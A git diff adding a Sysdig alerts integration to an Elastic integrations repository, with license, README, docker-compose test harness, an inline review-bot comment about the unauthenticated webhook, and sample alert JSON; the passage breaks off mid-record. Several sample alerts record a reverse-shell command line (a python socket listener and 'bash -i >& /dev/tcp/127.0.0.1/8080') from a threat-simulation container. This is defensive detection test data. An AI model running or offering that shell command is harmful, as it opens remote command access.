diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 5269b9b1506..51fc88b41eb 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -346,6 +346,7 @@
 /packages/symantec_endpoint_security @elastic/security-service-integrations
 /packages/synthetics @elastic/obs-ux-infra_services-team
 /packages/synthetics_dashboards @elastic/obs-ux-infra_services-team
+/packages/sysdig @elastic/security-service-integrations
 /packages/sysmon_linux @elastic/sec-linux-platform
 /packages/system @elastic/obs-infraobs-integrations
 /packages/system/changelog.yml @elastic/obs-infraobs-integrations @elastic/sec-linux-platform @elastic/sec-windows-platform
diff --git a/packages/sysdig/LICENSE.txt b/packages/sysdig/LICENSE.txt
new file mode 100644
index 00000000000..809108b857f
--- /dev/null
+++ b/packages/sysdig/LICENSE.txt
@@ -0,0 +1,93 @@ +Elastic License 2.0 + +URL: https://www.elastic.co/licensing/elastic-license + +## Acceptance + +By using the software, you agree to all of the terms and conditions below. + +## Copyright License + +The licensor grants you a non-exclusive, royalty-free, worldwide, +non-sublicensable, non-transferable license to use, copy, distribute, make +available, and prepare derivative works of the software, in each case subject to +the limitations and conditions below. + +## Limitations + +You may not provide the software to third parties as a hosted or managed +service, where the service provides users with access to any substantial set of +the features or functionality of the software. + +You may not move, change, disable, or circumvent the license key functionality +in the software, and you may not remove or obscure any functionality in the +software that is protected by the license key. + +You may not alter, remove, or obscure any licensing, copyright, or other notices +of the licensor in the software. Any use of the licensor’s trademarks is subject +to applicable law. + +## Patents + +The licensor grants you a license, under any patent claims the licensor can +license, or becomes able to license, to make, have made, use, sell, offer for +sale, import and have imported the software, in each case subject to the +limitations and conditions in this license. This license does not cover any +patent claims that you cause to be infringed by modifications or additions to +the software. If you or your company make any written claim that the software +infringes or contributes to infringement of any patent, your patent license for +the software granted under these terms ends immediately. If your company makes +such a claim, your patent license ends immediately for work on behalf of your +company. + +## Notices + +You must ensure that anyone who gets a copy of any part of the software from you +also gets a copy of these terms. 
+ +If you modify the software, you must include in any modified copies of the +software prominent notices stating that you have modified the software. + +## No Other Rights + +These terms do not imply any licenses other than those expressly granted in +these terms. + +## Termination + +If you use the software in violation of these terms, such use is not licensed, +and your licenses will automatically terminate. If the licensor provides you +with a notice of your violation, and you cease all violation of this license no +later than 30 days after you receive that notice, your licenses will be +reinstated retroactively. However, if you violate these terms after such +reinstatement, any additional violation of these terms will cause your licenses +to terminate automatically and permanently. + +## No Liability + +*As far as the law allows, the software comes as is, without any warranty or +condition, and the licensor will not be liable to you for any damages arising +out of these terms or the use or nature of the software, under any kind of +legal claim.* + +## Definitions + +The **licensor** is the entity offering these terms, and the **software** is the +software the licensor makes available under these terms, including any portion +of it. + +**you** refers to the individual or entity agreeing to these terms. + +**your company** is any legal entity, sole proprietorship, or other kind of +organization that you work for, plus all organizations that have control over, +are under the control of, or are under common control with that +organization. **control** means ownership of substantially all the assets of an +entity, or the power to direct its management and policies by vote, contract, or +otherwise. Control can be direct or indirect. + +**your licenses** are all the licenses granted to you for the software under +these terms. + +**use** means anything you do with the software requiring one of your licenses. 
+ +**trademark** means trademarks, service marks, and similar rights. diff --git a/packages/sysdig/_dev/build/build.yml b/packages/sysdig/_dev/build/build.yml new file mode 100644 index 00000000000..e2b012548e0 --- /dev/null +++ b/packages/sysdig/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: git@v8.11.0 diff --git a/packages/sysdig/_dev/build/docs/README.md b/packages/sysdig/_dev/build/docs/README.md new file mode 100644 index 00000000000..e9465995277 --- /dev/null +++ b/packages/sysdig/_dev/build/docs/README.md 
@@ -0,0 +1,38 @@ +# Sysdig Integration +This integration allows for the shipping of [Sysdig](https://sysdig.com/) alerts to Elastic for observability and organizational awareness. Alerts can then be analyzed by using either the dashboard included with the integration or via the creation of custom dashboards within Kibana. + +## Data Streams +The Sysdig integration collects one type of data stream: alerts. + +**Alerts** The Alerts data stream collected by the Sysdig integration is comprised of Sysdig Alerts. See more details about Sysdig Alerts in [Sysdig's Alerts Documentation](https://docs.sysdig.com/en/docs/sysdig-monitor/alerts/). A complete list of potential fields used by this integration can be found in the [Logs reference](#logs-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +In order to capture alerts from Sysdig you **must** configure Sysdig to output Alerts as JSON via [HTTP](#http-input). + +### HTTP Input + +The HTTP input allows the Elastic Agent to receive Sysdig Alerts via HTTP webhook. 
+ +**Required:** To configure Sysdig to output JSON, you must set up as webhook notification channel as outlined in the [Sysdig Documentation](https://docs.sysdig.com/en/docs/administration/administration-settings/outbound-integrations/notifications-management/set-up-notification-channels/configure-a-webhook-channel/). + +## Logs Reference + +### alerts + +Sysdig alerts can contain a multitude of various fields pertaining to the type of activity on the host machine. + +{{ fields "alerts" }} + +**Example event** + +{{ event "alerts" }} \ No newline at end of file diff --git a/packages/sysdig/_dev/deploy/docker/docker-compose.yml b/packages/sysdig/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..1f0caf7a6f7 --- /dev/null +++ b/packages/sysdig/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,9 @@ +services: + sysdig-alerts-http: + image: docker.elastic.co/observability/stream:v0.16.0 + volumes: + - ./sample_logs:/sample_logs:ro + environment: + - STREAM_PROTOCOL=webhook + - STREAM_ADDR=http://elastic-agent:9035/ + command: log --start-signal=SIGHUP --delay=5s /sample_logs/sysdig.log diff --git a/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log b/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log new file mode 100644 index 00000000000..fb8957ca56d --- /dev/null +++ b/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log 
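Review bot: The harness delivers the sample alerts over plaintext HTTP to `STREAM_ADDR=http://elastic-agent:9035/` with no shared-secret header, so the system test only exercises an unauthenticated listener, while the README added in this same commit tells users to point Sysdig's webhook channel at the agent without mentioning TLS or a secret header. The data stream manifest is not in this diff, so I cannot tell whether it exposes the `http_endpoint` input's `ssl` and `secret.header`/`secret.value` settings; if it does, the README should say so and this compose file (or a second service) should send the header so the authenticated path is covered, and if it does not, that gap is worth closing before the first release. The pinned `stream:v0.16.0` tag and the read-only `./sample_logs` mount are fine as written.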
@@ -0,0 +1,15 @@ +{"id":"17dec715376910362c8c3f62a4ceda2e","type":"policy","timestamp":1720031001639981110,"timestampRFC3339Nano":"2024-07-03T18:23:21.63998111Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","content":{"ruleName":"User Management Event Detected","ruleType":"RULE_TYPE_FALCO","ruleTags":["host","container","MITRE","MITRE_TA0003_persistence","MITRE_T1136_create_account","MITRE_T1136.001_create_account_local_account","MITRE_T1070_indicator_removal","MITRE_TA0005_defense_evasion","MITRE_TA0040_impact","MITRE_T1531_account_access_removal","MITRE_T1098_account_manipulation"],"output":"Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name=\u003cNA\u003e proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent=\u003cNA\u003e gggparent=\u003cNA\u003e container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request=\u003cNA\u003e proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 
CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname=\u003cNA\u003e user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"userdel tmp_suid_user","proc.cwd":"/tmp/","proc.exepath":"/usr/sbin/userdel","proc.name":"userdel","proc.pcmdline":"pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)","proc.pid":"2140169","proc.pname":"pwsh","proc.ppid":"2140088","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e0084978fbafcb03e2cabca","type":"policy","timestamp":1720030997187167383,"timestampRFC3339Nano":"2024-07-03T18:23:17.187167383Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules 
which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"c708ed01-9700-4787-91a5-6b2fb9863c0a","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import 
socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} 
+{"id":"17e04791d768c4aba1e9c40d944b8598","type":"policy","timestamp":1720453749365327019,"timestampRFC3339Nano":"2024-07-08T15:49:09.365327019Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58462623,"containerId":"8736272bd5fb","machineId":"7c:1e:52:0b:2b:61","hostMac":"7c:1e:52:0b:2b:61","content":{"ruleName":"Drop and execute new binary in container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","MITRE","MITRE_T1525_implant_internal_image","MITRE_TA0003_persistence"],"output":"Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)","fields":{"container.name":"ama-logs","proc.cmdline":"ruby /opt/dcr-config-parser.rb","proc.cwd":"/opt/","proc.exepath":"/usr/bin/ruby","proc.name":"ruby","proc.pcmdline":"livenessprobe.s 
/opt/livenessprobe.sh","proc.pid":"2817268","proc.pname":"livenessprobe.s","proc.ppid":"2817253","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"azure.instanceId":"ba53fc47-1119-4cbb-af2b-6d38b0e56160","azure.instanceName":"aks-userpool-12996081-vmss_1","azure.instanceSize":"Standard_D8ds_v5","cloudProvider.account.id":"7a100e05-8316-474d-99c0-b824d0e86366","cloudProvider.name":"azure","cloudProvider.region":"eastus","host.hostName":"aks-userpool-12996081-vmss000001","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"kube-system","kubernetes.pod.name":"ama-logs-cxhbd","kubernetes.workload.type":"daemonset"}} +{"id":"17dec7142e00a9068fb9185f9aa66c21","type":"policy","timestamp":1720030997187176710,"timestampRFC3339Nano":"2024-07-03T18:23:17.18717671Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"eb2b3e3c-ebc1-433f-88c7-2e032b75aadc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 
user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec36048564c002c559dbdad20be41","type":"policy","timestamp":1720026926000000000,"timestampRFC3339Nano":"2024-07-03T17:15:26Z","originator":"policy","category":"remote","source":"aws_cloudtrail","name":"Describe Instances - Sysdig AWS Activity Logs","description":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting 
user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","severity":7,"containerId":"","machineId":"","content":{"ruleName":"Describe Instances","ruleType":"RULE_TYPE_FALCO","ruleTags":["MITRE_T1082_system_information_discovery","Cloud","AWS","AWS_EC2","MITRE","MITRE_TA0007_discovery","MITRE_T1580_cloud_infrastructure_discovery"],"output":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","fields":{"container.name":""},"policyVersion":36,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"414773805239","cloudProvider.name":"aws","cloudProvider.region":"us-east-1"}} +{"id":"17dec7142e051355585daf677e472ed2","type":"policy","timestamp":1720030997187466069,"timestampRFC3339Nano":"2024-07-03T18:23:17.187466069Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"81618044-80a5-44af-b27a-46acead3a4bc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Privileged Shell Spawned Inside Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","shell","SOC2","SOC2_CC6.1","PCI","PCI_DSS","PCI_DSS_10.1","PCI_DSS_10.2.1","NIST","NIST_800-171","NIST_800-171_3.1.1","NIST_800-171_3.1.2","NIST_800-171_3.14.6","NIST_800-171_3.3.1","NIST_800-171_3.3.2","NIST_800-53","NIST_800-53_AC-17","NIST_800-53_AU-6(8)","NIST_800-53_AU-2","NIST_800-53_AC-2(4)","FedRAMP","FedRAMP_AC-2(4)","FedRAMP_AU-2","ISO","ISO_27001","ISO_27001_A.9.4.4","HIPAA","HIPAA_164.308(a)","HIPAA_164.310(b)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.i","HITRUST_CSF_01.j","HITRUST_CSF_01.n","HITRUST_CSF_01.p","HITRUST_CSF_01.s","HITRUST_CSF_01.y","HITRUST_CSF_06.i","HITRUST_CSF_09.aa","HITRUST_CSF_09.ab","HITRUST_CSF_09.ad","HITRUST_CSF_09.ae","HITRUST_CSF_09.m","HITRUST_CSF_09.s","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_T1068_exploitation_for_privilege_escalation","CIS"],"output":"Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 
/dev/tcp/127.0.0.1/8080 0\u003e\u00261 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname=\u003cNA\u003e group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"bash -i","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e03c2766a36e7950883c5c4","type":"policy","timestamp":1720030997187379830,"timestampRFC3339Nano":"2024-07-03T18:23:17.18737983Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"35cf0ae3-a4ed-4c00-831f-f0b7c8489718","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root 
